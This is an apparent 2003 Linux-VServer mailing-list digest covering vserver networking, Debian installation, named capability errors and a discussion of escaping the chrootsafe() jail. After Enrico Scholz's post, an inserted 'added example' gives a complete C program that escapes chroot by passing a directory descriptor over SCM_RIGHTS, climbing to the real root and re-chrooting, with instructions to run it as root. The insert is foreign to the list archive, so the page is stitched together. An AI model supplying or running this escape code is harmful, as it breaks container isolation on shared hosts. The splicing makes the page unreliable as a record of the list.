RE: RE: [Vserver] Rpms for vserver 0.27 (got it)

2003-11-25 Thread mile1
Hello Guys,
Here is the log from /var/log/messages (let me know what you think)

SSH Secure Shell 3.0.0 (Build 196)
Copyright (c) 2000-2001 SSH Communications Security Corp - http://www.ssh.com/

This is a commercial version and requires a license from
SSH Communications Security Corp.

This program uses RSA BSAFE® Crypto-C by RSA Security Inc.

Last login: Mon Nov 24 09:04:36 2003 from 172.16.0.9
[EMAIL PROTECTED] root]# 
[EMAIL PROTECTED] root]# service named start
Starting named: named: capset failed: Operation not permitted   [FAILED]
[EMAIL PROTECTED] root]# vi /var/log/messages
Nov 24 04:33:33 redhat9 syslogd 1.4.1: restart.
Nov 24 04:33:33 redhat9 syslog: syslogd startup succeeded
Nov 24 04:33:33 redhat9 syslog: klogd startup succeeded
Nov 24 04:33:33 redhat9 nscd: nscd startup succeeded
Nov 24 04:33:35 redhat9 sshd: RSA1 key generation succeeded
Nov 24 04:33:39 redhat9 sshd: RSA key generation succeeded
Nov 24 04:34:01 redhat9 sshd: DSA key generation succeeded
Nov 24 04:34:01 redhat9 sshd:  succeeded
Nov 24 04:34:02 redhat9 xinetd[13521]: pmap_set failed. service=sgi_fam program=391002 version=2
Nov 24 04:34:03 redhat9 xinetd[13521]: xinetd Version 2.3.10 started with libwrap options compiled in.
Nov 24 04:34:03 redhat9 xinetd[13521]: Started working: 0 available services
Nov 24 04:34:05 redhat9 xinetd: xinetd startup succeeded
Nov 24 04:34:09 redhat9 httpd: httpd startup succeeded
Nov 24 04:34:10 redhat9 crond: crond startup succeeded
Nov 24 04:34:28 redhat9 sshd(pam_unix)[13570]: session opened for user root by (uid=0)
Nov 24 04:38:30 redhat9 sshd(pam_unix)[13570]: session closed for user root
Nov 24 04:38:37 redhat9 sshd(pam_unix)[13683]: session opened for user root by (uid=0)
Nov 24 04:42:17 redhat9 sshd(pam_unix)[13683]: session closed for user root
Nov 24 04:43:01 redhat9 sshd(pam_unix)[13729]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=172.16.0.9  user=root
Nov 24 04:50:05 redhat9 sshd(pam_unix)[13732]: session opened for user root by (uid=0)
Nov 24 04:58:44 redhat9 sshd(pam_unix)[13732]: session closed for user root
Nov 24 04:59:00 redhat9 sshd(pam_unix)[13869]: session opened for user root by (uid=0)
Nov 24 05:02:33 redhat9 httpd: httpd shutdown succeeded
Nov 24 05:02:33 redhat9 sshd: sshd -TERM succeeded
Nov 24 05:02:33 redhat9 xinetd[13521]: Exiting...
Nov 24 05:02:33 redhat9 xinetd: xinetd shutdown succeeded
Nov 24 05:02:34 redhat9 crond: crond shutdown succeeded
Nov 24 05:02:34 redhat9 nscd: nscd shutdown succeeded
Nov 24 05:02:34 redhat9 syslog: klogd shutdown failed
Nov 24 05:02:34 redhat9 exiting on signal 15
Nov 24 05:02:52 redhat9 syslogd 1.4.1: restart.
Nov 24 05:02:52 redhat9 syslog: syslogd startup succeeded
Nov 24 05:02:53 redhat9 kernel: klogd 1.4.1, log source = /proc/kmsg started.
Nov 24 05:02:53 redhat9 syslog: klogd startup succeeded
Nov 24 05:02:53 redhat9 nscd: nscd startup succeeded
Nov 24 05:02:53 redhat9 sshd:  succeeded
Nov 24 05:02:53 redhat9 xinetd[14192]: pmap_set failed. service=sgi_fam program=391002 version=2
Nov 24 05:02:54 redhat9 xinetd[14192]: xinetd Version 2.3.10 started with libwrap options compiled in.
Nov 24 05:02:54 redhat9 xinetd[14192]: Started working: 0 available services
Nov 24 05:02:56 redhat9 xinetd: xinetd startup succeeded
Nov 24 05:03:00 redhat9 httpd: httpd startup succeeded
Nov 24 05:03:01 redhat9 crond: crond startup succeeded
Nov 24 05:03:25 redhat9 sshd(pam_unix)[14241]: session opened for user root by (uid=0)
Nov 24 05:26:28 redhat9 xinetd[14192]: Exiting...
Nov 24 05:26:29 redhat9 xinetd: xinetd shutdown succeeded
Nov 24 05:26:29 redhat9 xinetd[15573]: pmap_set failed. service=sgi_fam program=391002 version=2
Nov 24 05:26:30 redhat9 xinetd[15573]: xinetd Version 2.3.11 started with libwrap loadavg options compiled in.
Nov 24 05:26:30 redhat9 xinetd[15573]: Started working: 0 available services
Nov 24 05:26:32 redhat9 xinetd: xinetd startup succeeded
Nov 24 05:32:53 redhat9 syslogd 1.4.1: restart.
Nov 24 05:32:54 redhat9 qmail: Starting qmail:  succeeded
Nov 24 05:32:58 redhat9 qmail: qmail-send shutdown succeeded

[Vserver] TCP UDP originate IP in vserver

2003-11-25 Thread Petar
I'm thinking of moving a radius server from a standalone box to a vserver
but need to be sure that the traffic to and from the daemons running in
the vserver will use the nominated ip address as the source/destination
for all udp and tcp traffic.

I remember reading somewhere that TCP was OK but are there still issues
with UDP traffic showing as coming from the source ip of the vserver host
machine?

Cheers

..Petar


___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver


[Vserver] 2 IP-numbers for one vserver

2003-11-25 Thread Bert De Vuyst

Hello,

I would like to move an existing server to a vserver, but the machine does have 
2 IP-numbers (on eth0 and eth0:0)
Is it possible to have 2 IP-numbers in one vserver?

Thanks for your help,

Bert.

___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver


Re: [Vserver] 2 IP-numbers for one vserver

2003-11-25 Thread jon707
On Tue, Nov 25, 2003 at 06:50:47PM +0100, Bert De Vuyst wrote:
 
 Hello,
 
 I would like to move an existing server to a vserver, but the machine does have 
 2 IP-numbers (on eth0 and eth0:0)
 Is it possible to have 2 IP-numbers in one vserver?

Yes, I use it right now.



JonB
___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver


RE: [Vserver] [Announcement] util-vserver 0.26

2003-11-25 Thread Allen D. Parker II
Or if you're willing to throw off the .deb stigma, just build everything
from source. If you set up some configure scripts like I have in your
/usr/src you'll know where each package dumps its stuff.

 -Original Message-
 From: [EMAIL PROTECTED] [mailto:vserver-
 [EMAIL PROTECTED] On Behalf Of Bert De Vuyst
 Sent: Tuesday, November 25, 2003 3:23 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [Vserver] [Announcement] util-vserver 0.26
 
 On Tuesday 25 November 2003 21:01, ian douglas wrote:
   But maybe one should package util-vserver and upload it as independent
   package?
 
  Any chance someone has the whole vserver setup in a debian package? I
 have
  a very minimal installation (200M or so) on a fresh server of 'woody',
 and
  would like to get started with vserver on that system. When I FTP'd to
  Jacques' site though, he only had RPM's for the vserver-admin package,
 no
  source package at all.
 
 - Download the vserver source packages for debian testing from a debian
 mirror
 - build the packages (this should run out of the box on a debian 3.0)
 - this will give you a vserver package for debian 3.0
 
 Download the kernel source from a kernel.org mirror and get the kernel
 patch from the linux-vserver site.
 Patch the kernel source and configure the kernel.
 Compile the kernel using make-kpkg (kernel-package); this will give you a
 debian package you can install.
 
 Reboot your machine
 
 Download the script debian-newvserver.sh at the following URL:
 http://www.paul.sladen.org/vserver/debian/
 
 Customize it a bit to fit your needs (make sure you set the VSERVERS_ROOT)
 
 I hope this can help you,
 
 Bert.
 

___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver


[Vserver] chroot(safe) issues

2003-11-25 Thread Enrico Scholz
Hello,

on IRC two days ago we had a discussion about a secure chroot()
implementation. To make it short: no such thing exists.


The details: the problem with the current chroot(2) is that this syscall is
not stackable -- on every new chroot(2) invocation the dead zone is set to
a new value and the old one is dropped. This allows bypassing the chroot by
moving into an open directory with 'fchdir(fd)' and going from there with
subsequent 'chdir(..)' calls to the real root.

A vserver kernel-patch introduced a new chrootsafe() syscall which
tries to prevent the 'fchdir()' part by forbidding open directories at
chrootsafe() time. So the 'fchdir(fd)' cannot be executed.

Sounds really good and secure at first glance, but kloo_ brought up the
idea of transferring file descriptors via SCM_RIGHTS -- and it works; see

  http://www.tu-chemnitz.de/~ensc/chrootescape.c

(replace vc_chrootsafe() with your own implementation; the actual
program uses an experimental syscall which was written by Herbert
Poetzl to demonstrate the issue).


In attack mode, this program forks into two processes. The first one
calls vc_chrootsafe() to move the dead zone. The second process opens a
directory file descriptor and transmits it to the first process through
SCM_RIGHTS. Now this process can continue with conventional chroot()
methods to reach the real /.


Assuming stackable chroots (every chroot() puts the new dead zone into a
list which gets processed in vfs_permissions()), the SCM_RIGHTS method
can bypass these chroots as well. All you need is two processes within
independent chroots which share a filesystem (e.g. /home). The
first process moves into the environment of the second one with the
already mentioned fchdir() method. Now it can move freely to '..'
since the dead zone does not exist there.



Another method to escape chrootsafe() would be moving the
current directory: one process calls chrootsafe() to move the dead zone
and goes into a directory within the new jail. Now a second process
(started within the old dead zone) moves this directory to a place which
is outside of the new dead zone. The cwd fd of the new process stays in
this dir, and on the path to the real '/' the new dead zone will never
be reached.

Under some circumstances (two processes in independent chroot environments
which share a filesystem), this attack works for ordinary users
as well.


Please note that the current 'chmod 000' hack is not affected by these
attacks since it is a fixed barrier which cannot be bypassed.

Therefore, it does not make sense to hope for a magic chrootsafe() syscall
for vservers. Alternative approaches like CLONE_NEWNS in combination with
pivot_root() or 'mount --rbind vdir /' (suggested by Rik van Riel) must
be investigated to find better methods.





Enrico
___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver
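The two-process escape Enrico describes above, written out as an added example. This is not his chrootescape.c (the page links it but does not reproduce it), and because the experimental vc_chrootsafe() syscall is not available here, the child enters the jail with plain chroot(2). What the program shows is the part that defeats chrootsafe(): a helper outside the jail passes an open directory fd over SCM_RIGHTS, the jailed process fchdir()s into it, climbs with chdir("..") until "." and ".." are the same inode (the real root), and then chroot(".")s to make that its root again. chroot(2) needs CAP_SYS_CHROOT; when it fails with EPERM the program skips that step and still demonstrates the fd transfer and the climb. The jail directory is an assumed command-line argument.

```c
/* Added example (not Enrico's chrootescape.c): a helper outside the jail hands
 * a directory fd to a chrooted child over SCM_RIGHTS; the child fchdir()s into
 * it, climbs with chdir("..") to the real root and chroot(".")s there. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Send one descriptor over a UNIX socket as SCM_RIGHTS ancillary data. */
int send_fd(int sock, int fd) {
    char byte = 'F';
    union { char buf[CMSG_SPACE(sizeof(int))]; struct cmsghdr align; } u;
    memset(&u, 0, sizeof u);
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                          .msg_control = u.buf, .msg_controllen = sizeof u.buf };
    struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type = SCM_RIGHTS;
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor; the kernel installs a copy in our fd table. */
int recv_fd(int sock) {
    char byte;
    union { char buf[CMSG_SPACE(sizeof(int))]; struct cmsghdr align; } u;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                          .msg_control = u.buf, .msg_controllen = sizeof u.buf };
    if (recvmsg(sock, &msg, 0) != 1) return -1;
    struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
    if (!cm || cm->cmsg_level != SOL_SOCKET || cm->cmsg_type != SCM_RIGHTS) return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(cm), sizeof(int));
    return fd;
}

static int same_inode(const char *a, const char *b) {
    struct stat sa, sb;
    return stat(a, &sa) == 0 && stat(b, &sb) == 0 &&
           sa.st_dev == sb.st_dev && sa.st_ino == sb.st_ino;
}

/* chroot(2) needs CAP_SYS_CHROOT: 0 = done, 1 = skipped (EPERM), -1 = error. */
static int try_chroot(const char *dir) {
    if (chroot(dir) == 0) return 0;
    return errno == EPERM ? 1 : -1;
}

/* fchdir() into the received directory, then chdir("..") until "." and ".."
 * are the same inode, i.e. the real root. Returns steps taken, or -1. */
int climb_to_root(int dirfd) {
    if (fchdir(dirfd) != 0) return -1;
    int steps = 0;
    while (!same_inode(".", ".."))
        if (chdir("..") != 0 || ++steps > 4096) return -1;
    return steps;
}

/* Two-process demo; jail may be NULL. Returns 0 when the child ends up with
 * its cwd at the real root (and, if permitted, chrooted there). */
int demo_escape(const char *jail) {
    int sv[2], status;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                                  /* the "jailed" process */
        close(sv[0]);
        if (jail && (try_chroot(jail) < 0 || chdir("/") != 0)) _exit(2);
        int fd = recv_fd(sv[1]);
        if (fd < 0 || climb_to_root(fd) < 0) _exit(3);
        if (try_chroot(".") < 0) _exit(4);           /* conventional chroot trick */
        _exit(same_inode(".", "/") ? 0 : 5);
    }
    close(sv[1]);                                    /* helper outside the jail */
    int outside = open(".", O_RDONLY);               /* any directory outside */
    int rc = (outside >= 0 && send_fd(sv[0], outside) == 0) ? 0 : -1;
    if (outside >= 0) close(outside);
    close(sv[0]);
    if (waitpid(pid, &status, 0) < 0 || rc != 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

int main(int argc, char **argv) {
    const char *jail = argc > 1 ? argv[1] : NULL;    /* assumed, e.g. /vservers/redhat9 */
    int rc = demo_escape(jail);
    printf("escape demo: %s (rc=%d)\n", rc == 0 ? "reached real root" : "failed", rc);
    return rc == 0 ? 0 : 1;
}
```

Run it as root with an existing directory (`./escape /vservers/redhat9`, path assumed) to see the chrooted child end up at the real root. The 'chmod 000' barrier Enrico mentions bites exactly in climb_to_root(): if the jailed process lacks CAP_DAC_OVERRIDE and CAP_DAC_READ_SEARCH, chdir("..") into a mode-000 directory fails with EACCES and the climb stops with -1.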


[Vserver] Combine linux-vserver with UML?

2003-11-25 Thread yehat
Hello,

Is it possible to combine this project with user-mode-linux
(user-mode-linux.sf.net)?
I am thinking of starting a UML kernel on the host server and then some
vlinux partitions _inside_ the UML (or the other way round) :-) I imagine it
might be possible - maybe it would be very nice for developing/debugging this
great project?
Thanks,
  Frank

-- 
NEW FOR EVERYONE - GMX MediaCenter - for photos, music, files...
Photo album, file sharing, MMS, multimedia greetings, GMX FotoService

Sign up now for free at http://www.gmx.net

+++ GMX - the first address for Mail, Message, More! +++

___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver


Re: [Vserver] chroot(safe) issues

2003-11-25 Thread Alex Lyashkov

 Therefore, it does not make sense to hope for a magic chrootsafe() syscall
 for vservers. Alternative approaches like CLONE_NEWNS in combination with
 pivot_root() or 'mount --rbind vdir /' (suggested by Rik van Riel) must
 be investigated to find better methods.

I told Rik and Herbert: vserver _can't_ use CLONE_NEWNS and pivot_root because 
some mmapped files may be placed at the old root, and the old root can't be unmounted.

If you want to use a separate namespace you must write your own function to create 
the namespace and fill in the data; after that the process migrates to it.
It needs a kernel modification, but I can't find another way to work correctly 
with namespaces.
If you are interested, see my snapshots.

-- 
With best regards,
Alex
___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver


RE: RE: [Vserver] Rpms for vserver 0.27 (got it)

2003-11-25 Thread mile1
Here it is,

Last login: Sun Nov 23 21:53:32 2003
[EMAIL PROTECTED] root]# ls
anaconda-ks.cfg  install.log  install.log.syslog  vps
[EMAIL PROTECTED] root]# vi /etc/vservers/redhat9.conf
# Description: RedHat 9 VPS Server

if [ "$PROFILE" = "" ]; then
PROFILE=prod
fi
case $PROFILE in
prod)
# Select the IP number(s) assigned to the virtual server
# These IPs will be defined as IP alias
# The alias will be setup on IPROOTDEV
# You can specify the device if needed
# IPROOT="eth0:1.2.3.4 eth1:3.4.5.6"
IPROOT="172.16.0.109"
# You can define on which device the IP alias will be done
# The IP alias will be set when the server is started and unset
# when the server is stopped
# The netmask and broadcast are computed by default from IPROOTDEV
#IPROOTMASK=
#IPROOTBCAST=
IPROOTDEV="eth0"
# You can set a different host name for the vserver
# If empty, the host name of the main server is used
S_HOSTNAME="redhat9.icanreach.com"
;;
backup)
IPROOT=
#IPROOTMASK=
#IPROOTBCAST=
IPROOTDEV="eth0"
S_HOSTNAME=
;;
esac
# Set ONBOOT to yes or no if you want to enable this
# virtual server at boot time
ONBOOT=yes
# Control the start order of the vservers
# Lower values start first
PRIORITY=100
# You can set a different NIS domain for the vserver
# If empty, the current one is kept
# Set it to none to have no NIS domain set
S_DOMAINNAME=
# You can set the priority level (nice) of all processes in the vserver
# Even root won't be able to raise it
S_NICE=
# You can set various flags for the new security context
# lock: Prevent the vserver from setting new security context
# sched: Merge scheduler priority of all processes in the vserver
#so that it acts like a single one.
# nproc: Limit the number of processes in the vserver according to ulimit
#(instead of a per user limit, this becomes a per vserver limit)
# private: No other process can join this security context. Even root
# Do not forget the quotes around the flags
S_FLAGS="lock nproc"
# You can set various ulimit flags and they will be inherited by the
# vserver. You enter here various command line arguments of ulimit
# ULIMIT="-H -u 200"
# The example above, combined with the nproc S_FLAGS, will limit the
# vserver to a maximum of 200 processes
ULIMIT="-HS -u 1000"
# You can set various capabilities. By default, vservers are run
# with a limited set, so you can let root run in a vserver and not
# worry about it. He can't take over the machine. In some cases
# you may want to give a little more capabilities (such as CAP_NET_RAW)
# S_CAPS="CAP_NET_RAW"
S_CAPS="CAP_NET_RAW CAP_SYS_ADMIN CAP_NET_ADMIN"
# Select an unused context (this is optional)
# The default is to allocate a free context on the fly
# In general you don't need to force a context
#S_CONTEXT=

 
 From: Charles Dale [EMAIL PROTECTED]
 Date: 2003/11/25 Tue PM 08:16:37 EST
 To: [EMAIL PROTECTED]
 Subject: RE: RE: [Vserver] Rpms for vserver 0.27 (got it)
 
 [snip]
 
  Nov 24 12:00:13 redhat9 named: named: capset failed: Operation not
 permitted 
  Nov 24 12:00:13 redhat9 named: named startup failed
 
 Looks to me like CAP_SYS_RESOURCE hasn't been enabled for some reason for
 that vserver. Please post contents of the vserver conf file.
 
 BTW (to the list in general), how do I easily find out which caps a particular
 context has?
 
 Chuck
 
 

___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver
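Chuck's question in the quoted reply (how to find out which caps a particular context has) can be answered without special tooling: every process has CapInh, CapPrm and CapEff lines in /proc/<pid>/status, so pick any pid running inside the vserver (the host sees all of them) and decode the hex mask. The program below is an added example, not util-vserver code; the capability bit numbers are those of linux/capability.h, and the sample status text is constructed for the demo rather than captured from mile1's machine.

```c
/* Added example, not util-vserver code: decode the CapInh/CapPrm/CapEff lines
 * of /proc/<pid>/status to see which capabilities a process (and therefore
 * its security context) really holds. Bit numbers follow linux/capability.h. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { CAP_NET_BIND_SERVICE = 10, CAP_NET_ADMIN = 12, CAP_NET_RAW = 13,
       CAP_SYS_CHROOT = 18, CAP_SYS_ADMIN = 21, CAP_SYS_NICE = 23,
       CAP_SYS_RESOURCE = 24 };

/* Locate "<field>:" at the start of a line in a status buffer and parse the
 * hex mask that follows. Returns 1 on success and stores the mask in *out. */
int parse_cap_field(const char *status, const char *field, unsigned long long *out) {
    size_t flen = strlen(field);
    const char *p = status;
    while (p && *p) {
        if (strncmp(p, field, flen) == 0 && p[flen] == ':') {
            char *end;
            errno = 0;
            unsigned long long v = strtoull(p + flen + 1, &end, 16);
            if (end == p + flen + 1 || errno != 0) return 0;
            *out = v;
            return 1;
        }
        p = strchr(p, '\n');
        if (p) p++;
    }
    return 0;
}

int cap_is_set(unsigned long long mask, int cap) {
    return (int)((mask >> cap) & 1ULL);
}

/* How many of the wanted capabilities are absent from mask. */
int count_missing(unsigned long long mask, const int *want, int n) {
    int missing = 0;
    for (int i = 0; i < n; i++)
        if (!cap_is_set(mask, want[i])) missing++;
    return missing;
}

/* Read the live status of a pid ("self" also works) and return its
 * permitted and effective masks. Returns 1 on success. */
int read_caps(const char *pid, unsigned long long *prm, unsigned long long *eff) {
    char path[64], buf[8192];
    snprintf(path, sizeof path, "/proc/%s/status", pid);
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_cap_field(buf, "CapPrm", prm) && parse_cap_field(buf, "CapEff", eff);
}

/* Constructed sample (not captured from the poster's machine): a named
 * process whose context kept CAP_NET_BIND_SERVICE, CAP_NET_RAW,
 * CAP_SYS_CHROOT and CAP_SYS_NICE, but not CAP_SYS_RESOURCE. */
static const char SAMPLE_STATUS[] =
    "Name:\tnamed\n"
    "State:\tS (sleeping)\n"
    "Pid:\t13900\n"
    "CapInh:\t0000000000000000\n"
    "CapPrm:\t0000000000842400\n"
    "CapEff:\t0000000000842400\n";

int main(int argc, char **argv) {
    unsigned long long prm = 0, eff = 0;
    const char *pid = argc > 1 ? argv[1] : "self";
    if (!read_caps(pid, &prm, &eff)) {
        /* fall back to the constructed sample so the demo runs anywhere */
        parse_cap_field(SAMPLE_STATUS, "CapPrm", &prm);
        parse_cap_field(SAMPLE_STATUS, "CapEff", &eff);
    }
    printf("CapPrm=%016llx CapEff=%016llx\n", prm, eff);
    printf("CAP_SYS_RESOURCE %s, CAP_SYS_ADMIN %s\n",
           cap_is_set(eff, CAP_SYS_RESOURCE) ? "set" : "missing",
           cap_is_set(eff, CAP_SYS_ADMIN) ? "set" : "missing");
    return 0;
}
```

Build it on the host and run `./caps <pid>` against a process inside the context; whichever capability named's capset() call needs will show up as missing in CapEff. Decoding CapEff next to the S_CAPS line of the conf above also makes visible how much CAP_SYS_ADMIN and CAP_NET_ADMIN widen the set handed to the vserver's root.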


Re: [Vserver] Vserver + OpenMosix...

2003-11-25 Thread Ola Lundqvist
Hi

On Sun, Nov 09, 2003 at 09:48:08AM -, Luís Miguel Silva wrote:
 Hello everybody,
 
 I just thought of something!
 How about the vserver project united with the openmosix project?
 It would be great to be able to have multiple vservers enjoying the 
 cheerful blessings of multiprocessing.
 
 One of my servers is an x86 2.6GHz with 512MB RAM running about 6 vservers and it is 
 *totally* lagged.
 It would be great if we could balance the load through other machines (like we do with 
 openmosix).

I have had this in mind, even before I found vserver. My first thought was to use
User Mode Linux for this. I have not had much time to work on this. The big problem
is that I have not been able to get openmosix working. The main reason for that
is the lack of boxes to test on. That is fixed now though.

I will continue to work on this and see what I can find out. I heard in some other
thread that it compiles so I'll try to get there first. Later on I'll see how to
patch things so it works well.

I know that mosix is not well suited for IO bound applications. On the other
hand, that is a problem with mosix and not vservers. Vservers should be perfectly
suitable in a cluster environment for computational purposes.

Regards,

// Ola

 Best,
 +-
 | Luís Miguel Silva
 | Network Administrator@ ISPGaya.pt
 | Rua António Rodrigues da Rocha, 291/341 
 | Sto. Ovídio • 4400-025 V. N. de Gaia
 | Portugal
 | T: +351 22 3745730/3/5  F: +351 22 3745738
 | G: +351 93 6371253  E: [EMAIL PROTECTED]
 | H: http://lms.ispgaya.pt/
 +- 
-- 
 - Ola Lundqvist ---
/  [EMAIL PROTECTED] Annebergsslingan 37  \
|  [EMAIL PROTECTED] 654 65 KARLSTAD  |
|  +46 (0)54-10 14 30  +46 (0)70-332 1551   |
|  http://www.opal.dhs.org UIN/icq: 4912500 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36  4FE4 18A1 B1CF 0FE5 3DD9 /
 ---
___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver


Re: [Vserver] Combine linux-vserver with UML?

2003-11-25 Thread Ola Lundqvist
Hi

On Wed, Nov 26, 2003 at 04:43:48AM +0100, [EMAIL PROTECTED] wrote:
 Hello,
 
 Is it possible to combine this project with user-mode-linux
 (user-mode-linux.sf.net)?

Should be.

 I am thinking of starting a UML kernel on the host server and then some
 vlinux partitions
 _inside_ the UML (or the other way round) :-) I imagine it might be possible
 - maybe it would be very nice for
 developing/debugging this great project?

This would be nice (especially for debugging vservers). On the other hand
this will probably be solved when 2.6 support is ready. The 2.6 version
of the Linux kernel already has UML support.

If you want to run UML kernels inside a vserver, that should be no problem
(as far as I know) because UML is a userland application.

Regards,

// Ola

 Thanks,
   Frank
 

-- 
 - Ola Lundqvist ---
/  [EMAIL PROTECTED] Annebergsslingan 37  \
|  [EMAIL PROTECTED] 654 65 KARLSTAD  |
|  +46 (0)54-10 14 30  +46 (0)70-332 1551   |
|  http://www.opal.dhs.org UIN/icq: 4912500 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36  4FE4 18A1 B1CF 0FE5 3DD9 /
 ---
___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver


Re: [Vserver] [Announcement] util-vserver 0.26

2003-11-25 Thread Ola Lundqvist
Hi

On Tue, Nov 25, 2003 at 12:01:03PM -0800, ian douglas wrote:
  But maybe one should package util-vserver and upload it as independent
  package?
 
 Any chance someone has the whole vserver setup in a debian package? I have a
 very minimal installation (200M or so) on a fresh server of 'woody', and
 would like to get started with vserver on that system. When I FTP'd to
 Jacques' site though, he only had RPM's for the vserver-admin package, no
 source package at all.
 
 Anyone willing to hand-hold me through getting Debian up and running with
 vserver? ;o)

Add

deb http://debian.opal.dhs.org/ woody main

to your apt sources.list.

apt-get install vserver debootstrap
apt-get install kernel-image-2.4.20-mppe+ctx+xfs+vlan-386
(or some other arch 686, 686-smp etc). This kernel is used in a lot
of production machines so it can be considered stable.

Reboot with the new kernel.

newvserver --hostname foobar --domain foo.com --ip 192.168.1.1 --arch i386

Soon you can run the new vserver foobar.

Regards,

// Ola

 

-- 
 - Ola Lundqvist ---
/  [EMAIL PROTECTED] Annebergsslingan 37  \
|  [EMAIL PROTECTED] 654 65 KARLSTAD  |
|  +46 (0)54-10 14 30  +46 (0)70-332 1551   |
|  http://www.opal.dhs.org UIN/icq: 4912500 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36  4FE4 18A1 B1CF 0FE5 3DD9 /
 ---
___
Vserver mailing list
[EMAIL PROTECTED]
http://list.linux-vserver.org/mailman/listinfo/vserver